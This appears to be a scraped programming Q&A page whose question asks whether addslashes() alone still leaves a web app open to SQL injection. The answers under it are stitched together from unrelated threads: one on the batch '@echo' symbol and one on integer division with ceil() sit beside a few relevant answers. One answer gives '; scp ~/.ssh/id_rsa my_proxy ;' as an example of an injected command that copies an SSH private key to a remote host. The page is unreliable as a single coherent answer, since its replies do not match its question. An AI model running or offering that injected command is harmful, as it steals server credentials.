Asked  2 Years ago    Answers:  5   Viewed   65 times

Why do we need a DB-specific functions like mysql_real_escape_string()? What can it do that addslashes() doesn't?

Ignoring for the moment the superior alternative of parameterized queries, is a webapp that uses addslashes() exclusively still vulnerable to SQL injection, and if yes, how?

 Answers

4

Addslashes is generally not good enough when dealing with multibyte encoded strings.

Saturday, October 1, 2022
1

At symbol - @

The @ symbol tells the command processor to be less verbose; to only show the output of the command without showing it being executed or any prompts associated with the execution. When used it is prepended to the beginning of the command, it is not necessary to leave a space between the "@" and the command.

When "echo" is set to "off" it is not necessary to use "@" because setting "echo" to "off" causes this behavior to become automatic. "Echo" is usually set to "on" by default when the execution of a script begins. This is the reason "@echo off" is commonly used, to turn echo off without displaying the act of turning it off.

echo verbose
@echo less verbose
pause
Wednesday, October 26, 2022
 
robd
 
4

My recommendations:

  1. ditch mysqli in favor of PDO (with mysql driver)
  2. use PDO paremeterized prepared statements

You can then do something like:

$pdo_obj = new PDO( 'mysql:server=localhost; dbname=mydatabase', 
                    $dbusername, $dbpassword );

$sql = 'SELECT column FROM table WHERE condition=:condition';
$params = array( ':condition' => 1 );

$statement = $pdo_obj->prepare( $sql, 
    array( PDO::ATTR_CURSOR => PDO::CURSOR_FWDONLY ) );
$statement->execute( $params );
$result = $statement->fetchAll( PDO::FETCH_ASSOC );

PROs:

  1. No more manual escaping since PDO does it all for you!
  2. It's relatively easy to switch database backends all of a sudden.

CONs:

  • i cannot think of any.
Thursday, September 8, 2022
 
2

Common practice for customer-facing applications is to have an API-endpoint for each database query, which will require user authentication. The API server will then validate the input while formatting the query.

Directly exposing bash on server is never a good idea. Besides SQL injection, other much worse situations, like ; scp ~/.ssh/id_rsa my_proxy ;, can easily happen.


It appears that security is not OP's primary concern based on the comments below. Rather, the main focus is generating valid queries.

For that, the simplest solution is to perhaps use existing libraries, and let them handle the formatting. For example, in Python there is

https://dev.mysql.com/doc/connector-python/en/

Usually insertion should be done in batch for efficiency. But if preferred, you can write a script for inserting a row like

python3 tableX_insert.py --field1 value1 --field2 value2

I am sure in other languages similar modules for DB conn and cursor exist. Any effort to do the same with raw bash command line is re-inventing wheels.

Friday, August 19, 2022
 
1

If you don't have the cast the following happens (if number is 34).

  1. Using integer arithmetic, number/10 is number/10 rounded down, ie 3.
  2. ceil(3) = 3
  3. 3*10 = 30

If you have the cast, the following happens:

  1. (double)number = 34.0
  2. 34.0 / 10 = 3.4
  3. ceil(3.4) = 4.0
  4. 4.0*10 = 40

The important thing to realise is Integer division always rounds towards 0.

Sunday, October 30, 2022
 
Only authorized users can answer the search term. Please sign in first, or register a free account.
Not the answer you're looking for? Browse other questions tagged :
 

Browse Other Code Languages